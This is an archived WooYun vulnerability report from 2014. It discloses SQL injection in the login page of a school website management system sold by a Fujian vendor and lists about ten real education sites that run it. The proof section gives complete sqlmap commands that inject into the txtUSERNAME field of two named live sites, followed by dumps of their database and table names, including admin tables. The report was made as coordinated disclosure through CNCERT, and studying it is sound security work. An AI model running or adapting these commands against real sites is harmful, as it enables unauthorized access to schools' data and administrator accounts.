当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-063231

漏洞标题:某通用型校园网站管理系统存在SQL注射

相关厂商:cncert国家互联网应急中心

漏洞作者:

提交时间:2014-06-06 17:22

修复时间:2014-09-04 17:24

公开时间:2014-09-04 17:24

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-06-06: 细节已通知厂商并且等待厂商处理中
2014-06-11: 厂商已经确认,细节仅向厂商公开
2014-06-14: 细节向第三方安全合作伙伴开放
2014-08-05: 细节向核心白帽子及相关领域专家公开
2014-08-15: 细节向普通白帽子公开
2014-08-25: 细节向实习白帽子公开
2014-09-04: 细节向公众公开

简要描述:

影响福建省内多数学校..

详细说明:

厂商名称:福建闽教电脑多媒体有限公司
官网:http://www.minjiao.com/
产品名称:校园网站管理系统

q1.jpg

这里就不提供搜索引擎的关键字了,因为几乎google不到
之前以为是个例,差点失之交臂..不过我从官网的典型案例中手工找出了一些实例仅供cncert测试。

q5.jpg


http://www.minjiao.com/html/anli/anlis/ 典型案例地址

实例地址:
http://web.ptjy.com/web/web_programs_dotnet/member/ 莆田教育网
http://www.zzyxjy.com/Web/Web_Programs_DotNet/Member/ 云霄教育网
http://school.mwedu.gov.cn/web/web_programs_dotnet/Member/ 马尾教育信息网
http://school.gledu.gov.cn/web/web_programs_dotnet/Member/ 鼓楼教育信息网
http://school.zzlwjy.com/web/web_programs_dotnet/member/ 龙文教育信息网
http://school.fjhajy.net/web/web_programs_dotnet/member/ 华安教育信息网
http://schoolweb.ctjy.net/web/web_programs_dotnet/member/ 长泰教育网
http://school.fjjyjy.net/web/web_programs_dotnet/member/ 建阳教育信息网
http://www.ptedu.gov.cn/web/web_programs_dotnet/member/ 平潭教育局
www.qledu.gov.cn/web/web_programs_dotnet/Member/ 清流县教育网


登录处注入,验证码形同虚设..

q4.jpg


http://web.ptjy.com/web/web_programs_dotnet/member/ 莆田教育网校园网站管理系统:
sqlmap.py -u "http://web.ptjy.com/web/web_programs_dotnet/member/Default.aspx" --data "__VIEWSTATE=%2FwEPDwULLTExODU0NzgxMTgPZBYCAgEPZBYCAgMPDxYCHg9TaGllbGRDb2RlLVRleHQFDDNRQmlqK053a1FzPWRkZIdjxwQgl9kfNqYT9k2mdrbIkbQG&__EVENTVALIDATION=%2FwEWBgLzuf3pCQLlhOmkDwL1pt%2FYCwKa1eCCDwLf%2B6b%2BDgLMj8ehB%2BO3HTNZpisI8waUv5wAAWNfkiBv&txtUSERNAME=admin%27&txtPASSWORD=admin&TextBox_ValidCode=1294&Button_Submit=%B5%C7+%C2%BD" -p txtUSERNAME

available databases [13]:
[*] ApaDLibrary_370_1
[*] DB_Web
[*] DB_WEB_OLD
[*] master
[*] model
[*] msdb
[*] Northwind
[*] Oblog
[*] PT_DZDA
[*] PTJY_SCHOOL
[*] pubs
[*] SpaceBuilder
[*] tempdb


当前数据库中的表:

Database: DB_Web
[55 tables]
+-----------------------------------+
| VIEW1 |
| VIEW2 |
| View_AreaUser |
| View_Block1 |
| View_CurrentCounterStyle |
| View_CurrentWebTemplateStyle |
| View_InfoList |
| View_Web_BBS_Board_Subject_Replay |
| View_Web_DownList |
| View_Web_ImagesList |
| View_Web_InfoList |
| View_Web_Popedom_ShowBlock |
| View_Web_Record |
| Web_Admin |
| Web_Affiche |
| Web_AreaAdmin |
| Web_BBS_Board |
| Web_BBS_Replay |
| Web_BBS_Subject |
| Web_BBS_User |
| Web_DM_UserArea |
| Web_DM_UserType |
| Web_DownList |
| Web_GuestBook |
| Web_ImageNews |
| Web_ImagesList |
| Web_Info_Content |
| Web_Info_MainType |
| Web_Info_Popedom |
| Web_Info_Type |
| Web_InterFaces |
| Web_Link |
| Web_List |
| Web_Member |
| Web_NAV_Popedom |
| Web_NAV_TEMPLATE |
| Web_Nav |
| Web_Nav11 |
| Web_Nav_Temp |
| Web_PageType |
| Web_Popedom_Block_Table |
| Web_Popedom_Item_Table |
| Web_Popedom_User_Table |
| Web_Record |
| Web_RecordAction |
| Web_ReocrdBlock |
| Web_SchoolFellow |
| Web_SiteFuns |
| Web_Style |
| Web_Survey_Item |
| Web_Survey_Main |
| Web_WebStyleUserDefinition |
| dtproperties |
| sysconstraints |
| syssegments |
+-----------------------------------+

漏洞证明:

http://school.zzlwjy.com/web/web_programs_dotnet/member/ 龙文教育信息网校园网站管理系统:
sqlmap.py -u "http://school.zzlwjy.com/web/web_programs_dotnet/member/Default.aspx" --data "__VIEWSTATE=%2FwEPDwULLTExODU0NzgxMTgPZBYCAgEPZBYCAgMPDxYCHg9TaGllbGRDb2RlLVRleHQFDFk2N1BxYVFpWTVVPWRkZF1C%2BmuWyVNql%2FWGJKB9H2%2BvogBS&__EVENTVALIDATION=%2FwEWBgKjjNaMDQLlhOmkDwL1pt%2FYCwKa1eCCDwLf%2B6b%2BDgLMj8ehBxkhH4etl%2BjqvySVA3Wp7i%2FB%2BNwv&txtUSERNAME=admin%27&txtPASSWORD=admin&TextBox_ValidCode=9939&Button_Submit=%B5%C7+%C2%BD" -p txtUSERNAME

available databases [10]:
[*] DBWEB_LWJY
[*] master
[*] MinCMS_LWJY
[*] MinDoc_LWJY
[*] model
[*] msdb
[*] tempdb
[*] zkb
[*] ZZLW_SCHOOL
[*] ZZLY_MultiUserRes


当前数据库中的表:

Database: DBWEB_LWJY
[52 tables]
+-----------------------------------+
| View_AreaUser |
| View_Block |
| View_CurrentCounterStyle |
| View_CurrentWebTemplateStyle |
| View_InfoList |
| View_Web_BBS_Board_Subject_Replay |
| View_Web_DownList |
| View_Web_ImagesList |
| View_Web_InfoList |
| View_Web_Popedom_ShowBlock |
| View_Web_Record |
| Web_Admin |
| Web_Affiche |
| Web_AreaAdmin |
| Web_BBS_Board |
| Web_BBS_Replay |
| Web_BBS_Subject |
| Web_BBS_User |
| Web_DM_UserArea |
| Web_DM_UserType |
| Web_DownList |
| Web_GuestBook |
| Web_ImageNews |
| Web_ImagesList |
| Web_Info_Content |
| Web_Info_MainType |
| Web_Info_Popedom |
| Web_Info_Type |
| Web_InterFaces |
| Web_Link |
| Web_List |
| Web_Member |
| Web_NAV_Popedom |
| Web_NAV_TEMPLATE |
| Web_Nav |
| Web_Nav_Temp |
| Web_Nav_bak |
| Web_PageType |
| Web_Popedom_Block_Table |
| Web_Popedom_Item_Table |
| Web_Popedom_User_Table |
| Web_Record |
| Web_RecordAction |
| Web_ReocrdBlock |
| Web_SchoolFellow |
| Web_SiteFuns |
| Web_Style |
| Web_Survey_Item |
| Web_Survey_Main |
| Web_WebStyleUserDefinition |
| dtproperties |
+-----------------------------------+

修复方案:

联系福建闽教电脑多媒体有限公司

版权声明:转载请注明来源 @乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2014-06-11 10:56

厂商回复:

最新状态:

暂无